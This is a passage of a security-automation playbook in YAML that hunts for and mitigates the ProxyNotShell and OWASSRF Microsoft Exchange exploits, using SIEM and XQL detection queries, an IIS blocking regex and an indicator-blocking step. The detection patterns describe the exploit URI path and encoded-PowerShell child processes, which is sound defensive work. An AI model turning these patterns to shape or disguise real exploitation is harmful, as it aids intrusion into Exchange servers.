    type: regular
    task:
      id: a976674c-6e26-402d-8f97-35cc31b5da5a
      version: -1
      name: Detect a possibly successful ProxyNotShell bypass attempt.
      description: Searches an index.
      tags:
      - SIEMResults
      script: '|||search'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "55"
    scriptarguments:
      index:
        complex:
          root: inputs.ElasticIndex
      query:
        simple: (http.response.status_code:"200" AND url.original:\/owa\/\*@\*\/powershell)
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 1290,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "74":
    id: "74"
    taskid: 107a51ed-3e93-4217-87de-3d25445354b7
    type: playbook
    task:
      id: 107a51ed-3e93-4217-87de-3d25445354b7
      version: -1
      name: Detect a possibly successful ProxyNotShell bypass attempt
      description: This playbook runs a QRadar query and return its results to the context.
      playbookName: QRadarFullSearch
      type: playbook
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "18"
    scriptarguments:
      interval:
        simple: "1"
      query_expression:
        simple: SELECT UTF8(payload) FROM events WHERE "sc-status"='200' AND "URL" ILIKE '/owa/*@*/powershell'
      timeout:
        simple: "600"
    separatecontext: true
    continueonerrortype: ""
    loop:
      iscommand: false
      exitCondition: ""
      wait: 1
      max: 0
    view: |-
      {
        "position": {
          "x": -3080,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "75":
    id: "75"
    taskid: 4c119ae8-264d-4323-81ff-819bbc209806
    type: regular
    task:
      id: 4c119ae8-264d-4323-81ff-819bbc209806
      version: -1
      name: Detect a possibly successful ProxyNotShell bypass attempt.
      description: Creates a new asynchronous Ariel search. Returns the search ID. Search status and results can be polled by sending the search ID to the 'qradar-search-status-get' and 'qradar-search-results-get' commands. Accepts SELECT query expressions only.
      script: '|||qradar-search-create'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "69"
    scriptarguments:
      query_expression:
        simple: SELECT UTF8(payload) FROM events WHERE "sc-status"='200' AND "URL" ILIKE '/owa/*@*/powershell'
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1390,
          "y": 1570
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "76":
    id: "76"
    taskid: 1b73385b-83b2-4c7a-8f8c-94a63e117b65
    type: regular
    task:
      id: 1b73385b-83b2-4c7a-8f8c-94a63e117b65
      version: -1
      name: Detect possibly successful ProxyNotShell bypass - OWASSRF
      description: "This query was originally published in the threat analytics report, \"Exchange Server zero-days exploited in the wild\".\nIn early March 2021, Microsoft released patches for four different zero-day vulnerabilities affecting Microsoft Exchange Server. The vulnerabilities were being used in a coordinated attack. For more information on the vulnerabilities, visit the following links:\n  1. CVE-2021-26855\n  2. CVE-2021-26857\n  3. CVE-2021-26858\n  4. CVE-2021-27065\n\nThe following query checks for the IIS worker process in Exchange Server dropping files that appear to be the web shells and other threat artifacts observed in known attacks.\nMore queries related to this threat can be found under the See also section of this page.\n\n**Reference:** \n* https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/"
      tags:
      - SIEMResults
      script: '|||azure-log-analytics-execute-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "54"
    scriptarguments:
      query:
        simple: Webserver | where (sc_status == 200 and Url contains @'/owa/*@*/powershell')
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 920,
          "y": 2280
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "77":
    id: "77"
    taskid: f151f26a-8091-47e9-8209-71905d761869
    type: regular
    task:
      id: f151f26a-8091-47e9-8209-71905d761869
      version: -1
      name: Mitigate IIS URL Rewrite - OWASSRF - ProxyNotShell bypass
      description: "(**Note: This is a beta rule**)\n Mitigate Manually using the following instructions:\n    1. Open
      IIS Manager. \n    2. Select Default Web Site.\n    3. In the Feature View, click URL Rewrite.\n    4. In the Actions pane on the right-hand side, click Add Rule(s)…  \n    5. Select Request Blocking and click OK. \n    6. Add the string “.*owa\\/.*\\@.*\\/powershell.*” (excluding quotes).\n    7. Select Regular Expression under Using.\n    8. Select Abort Request under How to block and then click OK.\n    9. Expand the rule and select the rule with the pattern .*owa\\/.*\\@.*\\/powershell.* and click Edit under Conditions. \n    10. Change the Condition input from {URL} to {REQUEST_URI}\n\n**NOTE:** If you need to change any rule, it is best to delete and recreate it."
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "30"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 330,
          "y": 4250
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "78":
    id: "78"
    taskid: d4f6875e-d4cb-46a8-86f9-20f0355a19a4
    type: playbook
    task:
      id: d4f6875e-d4cb-46a8-86f9-20f0355a19a4
      version: -1
      name: Block Indicators - Generic v3
      playbookName: Block Indicators - Generic v3
      type: playbook
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "21"
      - "20"
    scriptarguments:
      AutoCommit:
        simple: "No"
      CustomBlockRule:
        simple: "True"
      CustomURLCategory:
        simple: Demisto Remediation - Malicious URLs
      IP:
        complex:
          root: DBotScore
          filters:
          - - operator: isEqualString
              left:
                value:
                  simple: DBotScore.Type
                iscontext: true
              right:
                value:
                  simple: ip
              ignorecase: true
          - - operator: greaterThanOrEqual
              left:
                value:
                  simple: DBotScore.Score
                iscontext: true
              right:
                value:
                  simple: "3"
          accessor: Indicator
          transformers:
          - operator: uniq
      InputEnrichment:
        simple: "False"
      MD5:
        complex:
          root: File
          accessor: MD5
      RuleDirection:
        simple: inbound
      RuleName:
        simple: XSOAR - Block Indicators playbook - ${incident.id}
      SHA256:
        complex:
          root: File
          accessor: SHA256
      URL:
        complex:
          root: DBotScore
          filters:
          - - operator: isEqualString
              left:
                value:
                  simple: DBotScore.Type
                iscontext: true
              right:
                value:
                  simple: url
              ignorecase: true
          - - operator: greaterThanOrEqual
              left:
                value:
                  simple: DBotScore.Score
                iscontext: true
              right:
                value:
                  simple: "3"
          accessor: Indicator
          transformers:
          - operator: uniq
      UserVerification:
        simple: "True"
      Username:
        complex:
          root: DBotScore
          filters:
          - - operator: isEqualString
              left:
                value:
                  simple: DBotScore.Type
                iscontext: true
              right:
                value:
                  simple: username
              ignorecase: true
          - - operator: greaterThanOrEqual
              left:
                value:
                  simple: DBotScore.Score
                iscontext: true
              right:
                value:
                  simple: "3"
          accessor: Indicator
    separatecontext: true
    continueonerrortype: ""
    loop:
      iscommand: false
      exitCondition: ""
      wait: 1
      max: 100
    view: |-
      {
        "position": {
          "x": -310,
          "y": 3940
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "79":
    id: "79"
    taskid: 4e1861a2-fec9-4ee6-8329-5a3d9f2d3d8a
    type: regular
    task:
      id: 4e1861a2-fec9-4ee6-8329-5a3d9f2d3d8a
      version: -1
      name: Collect indicators from SOCRadar
      description: This script will extract indicators from given HTML and will handle bad top-level domains to avoid false positives caused by file extensions.
      scriptName: ParseHTMLIndicators
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "35"
    scriptarguments:
      url:
        simple: https://socradar.io/threat-actors-exploit-unpatched-microsoft-exchange-zero-days/
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 550,
          "y": -390
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "80":
    id: "80"
    taskid: dc4bce3a-3a34-4b04-8861-de49a684ab8e
    type: regular
    task:
      id: dc4bce3a-3a34-4b04-8861-de49a684ab8e
      version: -1
      name: Collect indicators from PANW Unit42
      description: This script will extract indicators from given HTML and will handle bad top-level domains to avoid false positives caused by file extensions.
      scriptName: ParseHTMLIndicators
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "35"
    scriptarguments:
      exclude_indicators:
        simple: outlook[.]com
      url:
        simple: https://unit42.paloaltonetworks.com/threat-brief-OWASSRF/
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 130,
          "y": -390
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "81":
    id: "81"
    taskid: c1c56114-47b0-4e0a-8b66-7fc235228fec
    type: title
    task:
      id: c1c56114-47b0-4e0a-8b66-7fc235228fec
      version: -1
      name: ProxyNotShell XQL Queries
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "22"
      - "32"
      - "56"
      - "57"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1180,
          "y": 3460
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "82":
    id: "82"
    taskid: 09391d30-a6e9-4e35-80f2-743d299c0588
    type: condition
    task:
      id: 09391d30-a6e9-4e35-80f2-743d299c0588
      version: -1
      name: Choose which XQL queries to execute
      type: condition
      iscommand: false
      brand: ""
      description: Choose whether to execute ProxyNotShell, OWASSRF XQL queries or both.
    nexttasks:
      '#default#':
      - "19"
      Both:
      - "86"
      OWASSRF:
      - "83"
      ProxyNotShell:
      - "81"
    separatecontext: false
    conditions:
    - label: ProxyNotShell
      condition:
      - - operator: isEqualString
          left:
            value:
              complex:
                root: inputs.XQLHuntingQueriesType
            iscontext: true
          right:
            value:
              simple: ProxyNotShell
          ignorecase: true
    - label: OWASSRF
      condition:
      - - operator: isEqualString
          left:
            value:
              complex:
                root: inputs.XQLHuntingQueriesType
            iscontext: true
          right:
            value:
              simple: OWASSRF
          ignorecase: true
    - label: Both
      condition:
      - - operator: isEqualString
          left:
            value:
              complex:
                root: inputs.XQLHuntingQueriesType
            iscontext: true
          right:
            value:
              simple: Both
          ignorecase: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 3120
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "83":
    id: "83"
    taskid: bd1f18ef-ee2e-4dbd-8e7c-1eaa35b94af7
    type: title
    task:
      id: bd1f18ef-ee2e-4dbd-8e7c-1eaa35b94af7
      version: -1
      name: OWASSRF XQL Queries
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "84"
      - "85"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 340,
          "y": 3460
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "84":
    id: "84"
    taskid: 59467b70-dc41-453b-87ce-1d843231303b
    type: regular
    task:
      id: 59467b70-dc41-453b-87ce-1d843231303b
      version: -1
      name: Detect w3wp.exe suspicious child processes
      description: |-
        Execute an XQL query and retrieve results of an executed XQL query API. The command will be executed every 10 seconds until results are retrieved or until a timeout error is raised.
        When more than 1000 results are retrieved, the command will return a compressed gzipped JSON format file,
        unless the argument 'parse_result_file_to_context' is set to true and then the results will be extracted to the context.
      script: '|||xdr-xql-generic-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "19"
    scriptarguments:
      query:
        simple: "// Processes spawned by exploiting this vulnerability will have a parent process of w3wp.exe in the \"MSExchangePowerShellAppPool\" application pool. Review the results of this query for suspicious child processes.\n \nconfig case_sensitive = false\n \n| dataset = xdr_data\n \n| filter event_type = ENUM.PROCESS AND event_sub_type = ENUM.PROCESS_START\n \n| filter actor_process_image_name = \"w3wp.exe\" and actor_process_command_line contains \"MSExchangePowerShellAppPool\"\n \n| filter action_process_image_name not in (\"wermgr.exe\",\"wmiapsrv.exe\",\"dllhost.exe\")\n \n| fields _time, agent_id, agent_version, action_process_image_path,action_process_image_command_line,action_process_image_sha256, actor_process_command_line"
      query_name:
        simple: Detect w3wp.exe suspicious child processes
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 130,
          "y": 3640
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "85":
    id: "85"
    taskid: 716566f5-08bb-45fb-8f14-6ef3267cc9f0
    type: regular
    task:
      id: 716566f5-08bb-45fb-8f14-6ef3267cc9f0
      version: -1
      name: Detect w3wp.exe  spawning PowerShell with 'frombase64string' in the command-line
      description: |-
        Execute an XQL query and retrieve results of an executed XQL query API. The command will be executed every 10 seconds until results are retrieved or until a timeout error is raised.
        When more than 1000 results are retrieved, the command will return a compressed gzipped JSON format file,
        unless the argument 'parse_result_file_to_context' is set to true and then the results will be extracted to the context.
      script: '|||xdr-xql-generic-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "19"
    scriptarguments:
      query:
        simple: |-
          // Description: In activity we observed in the wild, a w3wp.exe process belonging to the "MSExchangePowerShellAppPool" application pool spawned PowerShell one-liners with "frombase64string" in the command line.

          config case_sensitive = false

          | dataset = xdr_data

          | filter event_type = ENUM.PROCESS AND event_sub_type = ENUM.PROCESS_START

          | filter action_process_image_name = "powershell.exe" and action_process_image_command_line contains "frombase64string"

          | filter (actor_process_image_name = "w3wp.exe" and actor_process_command_line contains "MSExchangePowerShellAppPool") or (causality_actor_process_image_name = "w3wp.exe" and causality_actor_process_command_line contains "MSExchangePowerShellAppPool")

          | fields action_process_image_path, action_process_image_command_line , actor_process_command_line , causality_actor_process_command_line, agent_hostname
      query_name:
        simple: Detect w3wp.exe  spawning PowerShell with 'frombase64string' in the command-line
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 550,
          "y": 3640
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "86":
    id: "86"
    taskid: 412aae29-70ef-4208-88f2-1068493bc979
    type: title
    task:
      id: 412aae29-70ef-4208-88f2-1068493bc979
      version: -1
      name: ProxyNotShell & OWASSRF XQL Queries
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "81"
      - "83"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 3320
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
system: true
view: |-
  {
    "linkLabelsPosition": {
      "11_19_#default#": 0.38,
      "11_82_Yes": 0.37,
      "12_11_yes": 0.45,
      "12_19_#default#": 0.32,
      "47_48_yes": 0.87,
      "47_49_yes": 0.81,
      "47_51_yes": 0.8,
      "47_54_#default#": 0.26,
      "47_76_yes": 0.86,
      "60_55_#default#": 0.34,
      "61_55_#default#": 0.17,
      "62_55_#default#": 0.12,
      "82_19_#default#": 0.35,
      "82_81_ProxyNotShell": 0.77,
      "82_83_OWASSRF": 0.67
    },
    "paper": {
      "dimensions": {
        "height": 5675,
        "width": 5310,
        "x": -3080,
        "y": -680
      }
    }
  }
inputs:
- key: CVEs
  value:
    simple: CVE-2022-41040,CVE-2022-41082
  required: false
  description: The vulnerabilities CVE indicators.
  playbookInputQuery:
- key: SplunkIndex
  value:
    simple: '*'
  required: false
  description: Splunk's index name in which to search. The default is "*" - All.
  playbookInputQuery:
- key: SplunkEarliestTime
  value:
    simple: -7d@d
  required: false
  description: Splunk's earliest time to search.
  playbookInputQuery:
- key: SplunkLatestTime
  value:
    simple: now
  required: false
  description: Splunk's latest time to search.
  playbookInputQuery:
- key: ElasticIndex
  value:
    simple: winlogbeat-*
  required: false
  description: Elastic's index name in which to search. The default is "winlogbeat-*" - All.
  playbookInputQuery:
- key: QRadarTimeRange
  value:
    simple: Last 7 DAYS
  required: false
  description: QRadar's query time range.
  playbookInputQuery:
- key: RunXQLHuntingQueries
  value:
    simple: "False"
  required: false
  description: Whether to execute the XQL queries.
  playbookInputQuery:
- key: XQLHuntingQueriesType
  value:
    simple: OWASSRF
  required: false
  description: |
    Whether to execute the ProxyNotShell or OWASSRF XQL queries or both.

    * Use 'ProxyNotShell' as an input to execute ProxyNotShell queries
    * Use 'OWASSRF' as an input to execute OWASSRF queries
    * Use 'Both' as an input to execute both ProxyNotShell and OWASSRF queries
  playbookInputQuery:
- key: PlaybookDescription
  value:
    simple: "**UPDATE**\nA new method for bypassing ProxyNotShell mitigations was found after being seen exploited in the wild by the Play ransomware gang.\nWhile the original exploit took advantage of the Autodiscover endpoint, the new exploit is using the OWA endpoint leading to SSRF.\nThe OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) via Outlook Web Access (OWA).\n\nThis playbook introduces several updates in response to the new discovery:\n- Hunting:\n    - Detecting possibly successful exploitation of the OWA SSRF vulnerability.\n- Mitigations:\n    - IIS URL Rewrite rule for the modified exploitation URI path.\n- Remediation:\n    - Block Indicators - Generic v3 playbook.\n\nMicrosoft is investigating two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, and the second one, identified as CVE-2022-41082, allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker.  \n\nCurrently, Microsoft is aware of limited targeted attacks using these two vulnerabilities.  In these attacks, CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability.\n\nThis playbook includes the following tasks:\n\n* Collect detection rules, indicators and mitigation tools.\n* Exploitation patterns hunting using Cortex XDR - XQL Engine.\n* Exploitation patterns hunting using 3rd party SIEM products:\n    * Azure Sentinel\n    * Splunk\n    * QRadar\n    * Elasticsearch\n* Indicators hunting using:\n    * PAN-OS\n    * Splunk\n    * QRadar\n* Provides Microsoft mitigation and detection capabilities.\n\n**More information:**\n\n[Threat Brief: OWASSRF Vulnerability Exploitation](https://unit42.paloaltonetworks.com/threat-brief-OWASSRF/)\n\n[Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)](https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/)\n\n**References:**\n\n[OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations](https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/)\n\n[Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/)\n\n[Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/)\n\n[WARNING: NEW ATTACK CAMPAIGN UTILIZED A NEW 0-DAY RCE VULNERABILITY ON MICROSOFT EXCHANGE SERVER](https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html)\n\n[ProxyNotShell— the story of the claimed zero days in Microsoft Exchange](https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9)\n\n**Note:** This is a beta playbook, which lets you implement and test pre-release software. Since the playbook is beta, it might contain bugs. Updates to the pack during the beta phase might include non-backward compatible features. We appreciate your feedback on the quality and usability of the pack to help us identify issues, fix them, and continually improve."
  required: false
  description: The playbook's description.
  playbookInputQuery:
outputs: []
tests:
- No tests (auto formatted)
fromversion: 6.5.0